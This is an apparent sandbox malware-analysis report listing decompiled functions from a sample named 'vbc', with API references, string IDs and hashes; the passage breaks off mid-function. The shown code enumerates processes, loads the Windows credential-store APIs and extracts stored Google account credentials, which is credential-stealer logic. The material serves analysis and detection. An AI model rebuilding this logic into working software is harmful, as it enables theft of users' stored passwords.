                                                                                                                                                                        0x00408242
                                                                                                                                                                        0x00408249
                                                                                                                                                                        0x0040824b
                                                                                                                                                                        0x0040824d
                                                                                                                                                                        0x0040824e
                                                                                                                                                                        0x00408251
                                                                                                                                                                        0x0040825a
                                                                                                                                                                        0x0040825a
                                                                                                                                                                        0x0040831c

                                                                                                                                                                        APIs
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040822E
                                                                                                                                                                        • LoadMenuA.USER32 ref: 0040823C
                                                                                                                                                                          • Part of subcall function 00408065: GetMenuItemCount.USER32 ref: 0040807A
                                                                                                                                                                          • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
                                                                                                                                                                          • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
                                                                                                                                                                          • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
                                                                                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040825A
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040829E
                                                                                                                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
                                                                                                                                                                        • memset.MSVCRT ref: 004082CF
                                                                                                                                                                        • GetWindowTextA.USER32 ref: 004082E0
                                                                                                                                                                        • EnumChildWindows.USER32 ref: 00408308
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0040830F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                        • API String ID: 3259144588-3822380221
                                                                                                                                                                        • Opcode ID: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                                                                                                                                                                        • Instruction ID: bbac317cb8ff6209085768228bd9594f53373bc5c39c5be55c638663b0a3ff3e
                                                                                                                                                                        • Opcode Fuzzy Hash: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                                                                                                                                                                        • Instruction Fuzzy Hash: 33210532540148BFDF12AF60DD45EEF3B68EB55706F0440BEFA41A1190DBB99E948B2D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E6C7 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040E6C7() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x418514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x417fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x417fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x417fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x417e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x417fcc = _t2;
								if(_t2 != 0) {
									 *0x418514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                                        0x0040e6ce
                                                                                                                                                                        0x0040e74a
                                                                                                                                                                        0x0040e74a
                                                                                                                                                                        0x0040e6d6
                                                                                                                                                                        0x0040e6dc
                                                                                                                                                                        0x0040e6e0
                                                                                                                                                                        0x0040e749
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e749
                                                                                                                                                                        0x0040e6ef
                                                                                                                                                                        0x0040e6f3
                                                                                                                                                                        0x0040e6f8
                                                                                                                                                                        0x0040e700
                                                                                                                                                                        0x0040e704
                                                                                                                                                                        0x0040e709
                                                                                                                                                                        0x0040e711
                                                                                                                                                                        0x0040e715
                                                                                                                                                                        0x0040e71a
                                                                                                                                                                        0x0040e722
                                                                                                                                                                        0x0040e726
                                                                                                                                                                        0x0040e72b
                                                                                                                                                                        0x0040e733
                                                                                                                                                                        0x0040e737
                                                                                                                                                                        0x0040e73c
                                                                                                                                                                        0x0040e73e
                                                                                                                                                                        0x0040e73e
                                                                                                                                                                        0x0040e73c
                                                                                                                                                                        0x0040e72b
                                                                                                                                                                        0x0040e71a
                                                                                                                                                                        0x0040e709
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                        • API String ID: 667068680-3953557276
                                                                                                                                                                        • Opcode ID: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                                                                                                                                                                        • Instruction ID: 5b748ad6718b7057422386d5a916c05b319ca6e7afffd602bf2aa3a230b78167
                                                                                                                                                                        • Opcode Fuzzy Hash: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                                                                                                                                                                        • Instruction Fuzzy Hash: E6F086B0AC5306A9E750CB26AD84FAB2DF85B85B81719403BF404F22D4DB7884428B6D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404651 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00404651(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046CC(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046CC(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}






                                                                                                                                                                        0x00404652
                                                                                                                                                                        0x00404654
                                                                                                                                                                        0x0040465e
                                                                                                                                                                        0x00404666
                                                                                                                                                                        0x00404668
                                                                                                                                                                        0x00404680
                                                                                                                                                                        0x0040468c
                                                                                                                                                                        0x00404698
                                                                                                                                                                        0x004046a4
                                                                                                                                                                        0x004046ad
                                                                                                                                                                        0x004046b1
                                                                                                                                                                        0x004046c2
                                                                                                                                                                        0x004046b9
                                                                                                                                                                        0x004046b9
                                                                                                                                                                        0x004046b9
                                                                                                                                                                        0x004046b1
                                                                                                                                                                        0x004046cb

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,73AFF420), ref: 004046D3
                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                        • API String ID: 2449869053-4258758744
                                                                                                                                                                        • Opcode ID: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                                                                                                                                                                        • Instruction ID: ff9940379d8f3ddc00738bb66027861fd390550b24bba25458702abe812256fc
                                                                                                                                                                        • Opcode Fuzzy Hash: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F012CB0A447019ACB30AF75C809B56BAF4AF94705B218D2EE1C5A36A0E77E9181CF58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004116BE Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                        			E004116BE(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E00412360(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00411533(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BE2A( &_v132);
						E0040BE4E(_v8,  &_v132, _a4);
						_t181 =  &_v132;
						E0040BEEC( &_v39,  &_v132,  &_v2244);
						memcpy( &_v2228,  &_v24, 8);
						E0040BE2A( &_v132);
						_push( &_v2244);
						_t109 = 0x18;
						E0040BE4E(_t109,  &_v132);
						E0040BEEC( &_v39, _t181,  &_v1188);
						memcpy( &_v1172,  &_v2244, 0x10);
						memcpy( &_v1156,  &_v24, 8);
						E0040BE2A(_t181);
						_push( &_v1188);
						_t122 = 0x28;
						E0040BE4E(_t122, _t181);
						E0040BEEC( &_v39, _t181,  &_v5348);
						E00405364( &_v6116, _t193,  &_v1180,  &_v5348);
						E004053E0( &_v5340,  &_v1188,  &_v4292,  &_v6116);
						_t177 = _a8;
						asm("cdq");
						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
						_a4 = 0;
						if(_t183 > 0) {
							do {
								E004053E0(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
								_a4 =  &(_a4[1]);
							} while (_a4 < _t183);
							_t177 = _a8;
						}
						_t135 = 0;
						if(_t177 > _t156) {
							do {
								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
								_t135 = _t135 + 1;
								 *(_t185 + _t135 - 0x1be1) = _t168;
							} while (_t135 < _t177);
						}
						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
						strcpy(_a12,  &_v7136);
						E0040BE2A( &_v132);
						_t67 = _t177 - 4; // 0x0
						E0040BE4E(_t67,  &_v132, _a12);
						E0040BEEC(_t177,  &_v132,  &_v40);
						memcpy( &_v8,  &_v40, 4);
						memcpy( &_v12,  &_v7140, 4);
						_t156 = 1;
						 *_a16 = 0 | _v8 == _v12;
					}
				}
				return _t156;
			}







































                                                                                                                                                                        0x004116be
                                                                                                                                                                        0x004116c6
                                                                                                                                                                        0x004116ce
                                                                                                                                                                        0x004116dd
                                                                                                                                                                        0x004116e3
                                                                                                                                                                        0x004116fc
                                                                                                                                                                        0x004116ff
                                                                                                                                                                        0x00411709
                                                                                                                                                                        0x0041170c
                                                                                                                                                                        0x00411712
                                                                                                                                                                        0x00411714
                                                                                                                                                                        0x00411722
                                                                                                                                                                        0x00411723
                                                                                                                                                                        0x00411724
                                                                                                                                                                        0x00411733
                                                                                                                                                                        0x00411739
                                                                                                                                                                        0x00411747
                                                                                                                                                                        0x0041174d
                                                                                                                                                                        0x0041175b
                                                                                                                                                                        0x00411761
                                                                                                                                                                        0x00411768
                                                                                                                                                                        0x0041176e
                                                                                                                                                                        0x0041176f
                                                                                                                                                                        0x00411770
                                                                                                                                                                        0x00411771
                                                                                                                                                                        0x00411778
                                                                                                                                                                        0x00411781
                                                                                                                                                                        0x00411787
                                                                                                                                                                        0x0041178f
                                                                                                                                                                        0x0041179d
                                                                                                                                                                        0x004117a9
                                                                                                                                                                        0x004117ac
                                                                                                                                                                        0x004117be
                                                                                                                                                                        0x004117c8
                                                                                                                                                                        0x004117d3
                                                                                                                                                                        0x004117d6
                                                                                                                                                                        0x004117d9
                                                                                                                                                                        0x004117e5
                                                                                                                                                                        0x004117fa
                                                                                                                                                                        0x0041180c
                                                                                                                                                                        0x00411813
                                                                                                                                                                        0x0041181e
                                                                                                                                                                        0x00411821
                                                                                                                                                                        0x00411824
                                                                                                                                                                        0x00411830
                                                                                                                                                                        0x0041184f
                                                                                                                                                                        0x00411867
                                                                                                                                                                        0x0041186c
                                                                                                                                                                        0x00411871
                                                                                                                                                                        0x00411879
                                                                                                                                                                        0x00411881
                                                                                                                                                                        0x00411884
                                                                                                                                                                        0x00411886
                                                                                                                                                                        0x004118a1
                                                                                                                                                                        0x004118a6
                                                                                                                                                                        0x004118ac
                                                                                                                                                                        0x004118af
                                                                                                                                                                        0x004118af
                                                                                                                                                                        0x004118b2
                                                                                                                                                                        0x004118b6
                                                                                                                                                                        0x004118b8
                                                                                                                                                                        0x004118bf
                                                                                                                                                                        0x004118c6
                                                                                                                                                                        0x004118c9
                                                                                                                                                                        0x004118c9
                                                                                                                                                                        0x004118b8
                                                                                                                                                                        0x004118dc
                                                                                                                                                                        0x004118e3
                                                                                                                                                                        0x004118eb
                                                                                                                                                                        0x004118f3
                                                                                                                                                                        0x004118f9
                                                                                                                                                                        0x00411905
                                                                                                                                                                        0x00411914
                                                                                                                                                                        0x00411926
                                                                                                                                                                        0x0041193e
                                                                                                                                                                        0x0041193f
                                                                                                                                                                        0x0041193f
                                                                                                                                                                        0x00411714
                                                                                                                                                                        0x00411947

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004116E3
                                                                                                                                                                          • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                        • strlen.MSVCRT ref: 004116FF
                                                                                                                                                                        • memset.MSVCRT ref: 00411739
                                                                                                                                                                        • memset.MSVCRT ref: 0041174D
                                                                                                                                                                        • memset.MSVCRT ref: 00411761
                                                                                                                                                                        • memset.MSVCRT ref: 00411787
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                          • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                        • memcpy.MSVCRT ref: 004117BE
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                        • memcpy.MSVCRT ref: 004117FA
                                                                                                                                                                        • memcpy.MSVCRT ref: 0041180C
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 004118E3
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411914
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411926
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset$strlen$strcpy
                                                                                                                                                                        • String ID: salu
                                                                                                                                                                        • API String ID: 2660478486-4177317985
                                                                                                                                                                        • Opcode ID: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                        • Instruction ID: f1a42822f8ef7e9ef4ab6207fa972415b32dae4f069819a41f3cbfc12677ad8b
                                                                                                                                                                        • Opcode Fuzzy Hash: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 84717E7290011DAACB10EB95CC81ADE77BDFF08348F1445BAF648E7151DB749B888F98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404292 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00404292(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E00402197( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E004023C6( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                                                                                                                        0x00404292
                                                                                                                                                                        0x0040429d
                                                                                                                                                                        0x004042a0
                                                                                                                                                                        0x004042a6
                                                                                                                                                                        0x004042a9
                                                                                                                                                                        0x004042dd
                                                                                                                                                                        0x004042f8
                                                                                                                                                                        0x00404304
                                                                                                                                                                        0x0040430e
                                                                                                                                                                        0x00404322
                                                                                                                                                                        0x00404332
                                                                                                                                                                        0x00404345
                                                                                                                                                                        0x0040435e
                                                                                                                                                                        0x00404388
                                                                                                                                                                        0x0040438d
                                                                                                                                                                        0x00404399
                                                                                                                                                                        0x004043a2
                                                                                                                                                                        0x004043a4
                                                                                                                                                                        0x004043a4
                                                                                                                                                                        0x004043b5
                                                                                                                                                                        0x004043b5
                                                                                                                                                                        0x004043c0

                                                                                                                                                                        APIs
                                                                                                                                                                        • wcsstr.MSVCRT ref: 004042C7
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00404332
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00404345
                                                                                                                                                                        • strchr.MSVCRT ref: 00404353
                                                                                                                                                                        • strlen.MSVCRT ref: 00404367
                                                                                                                                                                        • sprintf.MSVCRT ref: 00404388
                                                                                                                                                                        • strchr.MSVCRT ref: 00404399
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                                                                                        • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                        • API String ID: 1359934567-4070641962
                                                                                                                                                                        • Opcode ID: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                        • Instruction ID: 1c9d9e350e6bfb7db098629835421676e34b4d03cf30903a353d84187424ac51
                                                                                                                                                                        • Opcode Fuzzy Hash: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                        • Instruction Fuzzy Hash: AE3166B2904219AFDB11DB91DD81FDBB7ACAB14314F1001A7B708E2180D678AF958A98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004083E4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E004083E4(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E00412360(0x1004, __ecx);
				strcpy(0x4181b8, _a8);
				strcpy(0x4182c0, "general");
				E00407FBF(_t35, "TranslatorName", 0x41344f);
				E00407FBF(_t35, "TranslatorURL", 0x41344f);
				EnumResourceNamesA(_a4, 4, E0040820D, 0);
				EnumResourceNamesA(_a4, 5, E0040820D, 0);
				strcpy(0x4182c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E0040802D(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4181b8 = 0;
				return _t21;
			}








                                                                                                                                                                        0x004083e4
                                                                                                                                                                        0x004083ec
                                                                                                                                                                        0x004083fc
                                                                                                                                                                        0x0040840c
                                                                                                                                                                        0x0040841c
                                                                                                                                                                        0x00408427
                                                                                                                                                                        0x00408442
                                                                                                                                                                        0x0040844c
                                                                                                                                                                        0x00408454
                                                                                                                                                                        0x0040845f
                                                                                                                                                                        0x00408469
                                                                                                                                                                        0x00408470
                                                                                                                                                                        0x00408478
                                                                                                                                                                        0x00408484
                                                                                                                                                                        0x0040848c
                                                                                                                                                                        0x00408496
                                                                                                                                                                        0x0040849c
                                                                                                                                                                        0x0040849d
                                                                                                                                                                        0x0040849e
                                                                                                                                                                        0x004084a8
                                                                                                                                                                        0x004084b1

                                                                                                                                                                        APIs
                                                                                                                                                                        • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
                                                                                                                                                                        • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
                                                                                                                                                                          • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
                                                                                                                                                                          • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
                                                                                                                                                                          • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
                                                                                                                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000004,0040820D,00000000), ref: 00408442
                                                                                                                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000005,0040820D,00000000), ref: 0040844C
                                                                                                                                                                        • strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
                                                                                                                                                                        • memset.MSVCRT ref: 00408470
                                                                                                                                                                        • LoadStringA.USER32 ref: 00408484
                                                                                                                                                                          • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                        • API String ID: 1060401815-3647959541
                                                                                                                                                                        • Opcode ID: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                        • Instruction ID: 8ec8ecd25de3f69567fa6951aee80203735b19b36847dd402765e4c6546554b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 201108319401543AD73167569D0AFDB3E6CDB85B94F1040BFBA48A61C1D9BC59C086BC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B656 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E0040B656(intOrPtr __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t51;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t93;
				signed char _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t104;

				_t95 = __ecx;
				_t100 = _a4;
				_t104 = _t100 - 0x402;
				_t103 = __ecx;
				if(_t104 > 0) {
					_t51 = _t100 - 0x415;
					__eflags = _t51;
					if(_t51 == 0) {
						E0040A632(__ecx);
						L22:
						__eflags = 0;
						E0040A3E9(0, _t95, _t103, 0);
						L23:
						if(_t100 ==  *((intOrPtr*)(_t103 + 0x374))) {
							_t92 = _a12;
							_t97 =  *(_a12 + 0xc);
							_t56 =  *((intOrPtr*)(_t103 + 0x370));
							if((_t97 & 0x00000008) == 0) {
								__eflags = _t97 & 0x00000040;
								if((_t97 & 0x00000040) != 0) {
